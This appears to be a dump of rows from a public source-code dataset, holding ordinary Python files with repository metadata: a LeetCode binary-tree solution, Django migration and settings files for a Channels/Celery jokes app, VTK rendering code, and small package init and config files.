volActor.GetProperty().EdgeVisibilityOn()
volActor.GetProperty().SetColor(colors.GetColor3d('Salmon'))
renderer.AddActor(volActor)
renderer.SetBackground(colors.GetColor3d('SlateGray'))
renWin.SetSize(512, 512)
renWin.SetWindowName('Vol')
# Interact with the data.
renWin.Render()
iren.Start()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
373bef96a622b1cfeedf8d9879a96af87bfd9e46
|
f8e8e365c9cf58b61d72655bc2340baeaed5baff
|
/Leetcode/Python Solutions/Binary Trees/UnivaluedBinaryTree.py
|
3ed40370aac53df28bfef683b6d36e893ee4ed0e
|
[
"MIT"
] |
permissive
|
Mostofa-Najmus-Sakib/Applied-Algorithm
|
39a69f6b9ed113efe4a420d19cad79e0aa317637
|
bc656fd655617407856e0ce45b68585fa81c5035
|
refs/heads/master
| 2023-08-31T19:54:34.242559 | 2021-11-05T03:43:35 | 2021-11-05T03:43:35 | 412,263,430 | 0 | 0 |
MIT
| 2021-09-30T23:45:29 | 2021-09-30T23:45:25 | null |
UTF-8
|
Python
| false | false | 2,071 |
py
|
"""
LeetCode Problem:965. Univalued Binary Tree
Link: https://leetcode.com/problems/univalued-binary-tree/
Language: Python
Written by: Mostofa Adib Shakib
Two versions of the solution
Version 1(Recursive using DFS):
In this version of the solution we use a dfs helper method to compare every node in the true. If the value of every node is not equal to the
root node we return False. This method is faster as it doesn't iterative every node.
Version 2(Iteratively using In-Order traversal):
In this version of the solution we use a stack. We push all the left child of a node into the stack up until we reach a Null node.
If we reach a Null node and the stack is not empty then we pop an element from the stack and and compare it's value with the root node
if they are equal then we append it's right child to the stack or else we return False. This method is a bit slower as we are iterating over
all the left child of a node before comparing it's value with the root node.
"""
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
# Version 1(Recursion using DFS)
class Solution(object):
def isUnivalTree(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
def dfs(root,val):
if not root: return True
return root.val == val and dfs(root.left,val) and dfs(root.right,val)
return dfs(root,root.val)
# Version 2(Iteratively using In-Order traversal)
class Solution(object):
def isUnivalTree(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
if not root: return True
curr = root
stack = []
while True:
if curr is not None:
stack.append(curr)
curr = curr.left
elif stack:
curr = stack.pop()
if root.val != curr.val:
return False
curr = curr.right
else:
break
return True
|
[
"[email protected]"
] | |
7c2f2a6315e31fdfcbb25564c9f2140caa632aab
|
c72cde3c84b4c3ed1180f5e88a30780a90a70075
|
/source/accounts/migrations/0004_auto_20191101_1520.py
|
150d17738d1a16ee4602fb5d52c475c89c795da5
|
[] |
no_license
|
Aisuluu1405/python_group_3_homework_49_Aisulu_Dzhusupova
|
a88187e34a71c282eedd08c2616c66a19daef356
|
6fbf0a57dfc85ebd8203142f6b903228c67b1051
|
refs/heads/master
| 2022-11-28T18:32:32.732140 | 2019-12-09T14:11:01 | 2019-12-09T14:11:01 | 211,069,782 | 0 | 0 | null | 2022-11-22T04:47:28 | 2019-09-26T11:09:26 |
Python
|
UTF-8
|
Python
| false | false | 590 |
py
|
# Generated by Django 2.2 on 2019-11-01 15:20
from django.db import migrations
def create_user_profiles(apps, schema_editor):
User = apps.get_model('auth', 'User')
UserProfile = apps.get_model('accounts', 'UserProfile')
for user in User.objects.all():
UserProfile.objects.get_or_create(user=user)
def drop_user_profiles(apps, schema_editor):
pass
class Migration(migrations.Migration):
dependencies = [
('accounts', '0003_auto_20191101_0536'),
]
operations = [
migrations.RunPython(create_user_profiles, drop_user_profiles)
]
|
[
"[email protected]"
] | |
94400f966a70ee4add2a8083778d5eb0fba7eaca
|
05857cd30669a914d69ce872141964a4e6b31edd
|
/sample.py
|
2cc30d2240966d3dfd725f69d94e80076a8fa628
|
[] |
no_license
|
EricSchles/test_naming
|
f61e0900835edbbd7f5054e1916e38647f460e9e
|
a9be0cc48c40b704c7970968458db3631c8116e2
|
refs/heads/master
| 2021-01-17T12:21:09.588993 | 2014-11-05T00:11:34 | 2014-11-05T00:11:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 233 |
py
|
class Foo:
def __init__(self,first,second):
self.first = first
self.second = second
def adder(self):
return self.first + self.second
def multipler(self):
return self.first * self.second
|
[
"[email protected]"
] | |
44dd986a455b97ff422c59570f460e119a19fc12
|
3496ead97ad993b8c32ff6f96cf3474110baef79
|
/thisisproject/settings.py
|
d7c2755ccda782a22425d6f608116a620dfddfd3
|
[] |
no_license
|
vpgrishkin/django-channels-celery-jokes
|
7e7d5b71110f14ef08c2e684ae89c39cd321b219
|
b617cc97e8f9ad0710f6bd6de122749263b28c18
|
refs/heads/master
| 2020-03-31T08:48:01.011142 | 2018-06-17T06:16:32 | 2018-06-17T06:16:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,276 |
py
|
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "hzk=g8z3=*xds6zkaol*enq+^)b8_5knm6=gygewnc3yt3urg3"
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"channels",
"jokes.apps.JokesConfig",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "thisisproject.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
]
},
}
]
WSGI_APPLICATION = "thisisproject.wsgi.application"
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = "/static/"
# Celery
CELERY_BROKER_URL = "redis://redis:6379/0"
CELERY_ACCEPT_CONTENT = ["json"]
CELERY_TASK_SERIALIZER = "json"
CELERY_RESULT_SERIALIZER = "json"
CELERY_BEAT_SCHEDULE = {
"get_random_joke": {"task": "jokes.tasks.get_random_joke", "schedule": 15.0}
}
# Channels
ASGI_APPLICATION = "thisisproject.routing.application"
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {"hosts": [("redis", 6379)]},
}
}
|
[
"[email protected]"
] | |
bebe9062b31f8a9800ce2d05f8bdc7ae7ac81e36
|
6ed034d0a5e239d7b0c528b287451409ffb4a494
|
/mmpose/core/camera/__init__.py
|
a4a3c5526560996791a85f0d84a72a66286486ca
|
[
"Apache-2.0"
] |
permissive
|
ViTAE-Transformer/ViTPose
|
8f9462bd5bc2fb3e66de31ca1d03e5a9135cb2bf
|
d5216452796c90c6bc29f5c5ec0bdba94366768a
|
refs/heads/main
| 2023-05-23T16:32:22.359076 | 2023-03-01T06:42:22 | 2023-03-01T06:42:22 | 485,999,907 | 869 | 132 |
Apache-2.0
| 2023-03-01T06:42:24 | 2022-04-27T01:09:19 |
Python
|
UTF-8
|
Python
| false | false | 232 |
py
|
# Copyright (c) OpenMMLab. All rights reserved.
from .camera_base import CAMERAS
from .single_camera import SimpleCamera
from .single_camera_torch import SimpleCameraTorch
__all__ = ['CAMERAS', 'SimpleCamera', 'SimpleCameraTorch']
|
[
"[email protected]"
] | |
497f1dde8d0a8091281fc01b4c148a70ba5404db
|
5c3ab4a045f6df4edb647e509ca7f79c9268a5a6
|
/src/tableau_api_lib/sample/__init__.py
|
b000487bafa8c5ea2044d58507c0cde5f83320c0
|
[
"MIT"
] |
permissive
|
divinorum-webb/tableau-api-lib
|
d1bafa5c876ce26c5884b6b1bc53c0969565c52b
|
99a1d3c2a4d7dc20d1c4a619d58cc756ace1db41
|
refs/heads/master
| 2023-04-04T22:52:37.753153 | 2022-10-15T11:51:45 | 2022-10-15T11:51:45 | 203,291,381 | 84 | 29 |
MIT
| 2023-03-29T13:40:22 | 2019-08-20T03:18:01 |
Python
|
UTF-8
|
Python
| false | false | 42 |
py
|
from .config_example import sample_config
|
[
"[email protected]"
] | |
b13bca55632de5a3c7d5819f798989c93fc5fbe1
|
98cd5ddf45a73aea64bbfac0c0104829d7231b81
|
/S - Grid Slide Square - Filled/info.py
|
3a06687be68f63f5b6e0b36197f1252211343cde
|
[] |
no_license
|
atheis4/ETC_Modes_Extra
|
42508d523cfe632a3335e29f6e1e40af91df231b
|
d0ce221562105382a7a73cc6d280f4ad0eabf6f3
|
refs/heads/master
| 2022-04-04T11:15:07.335910 | 2020-01-03T20:27:32 | 2020-01-03T20:27:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 261 |
py
|
name = "S - Grid Slide Square - Filled"
description = "Grid of oscillating filled squares with LFO-controlled sliding rows with animated color fade"
knob1 = "Slide LFO speed"
knob2 = "Slide LFO range"
knob3 = "Size"
knob4 = "Color"
released = "March 18 2019"
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.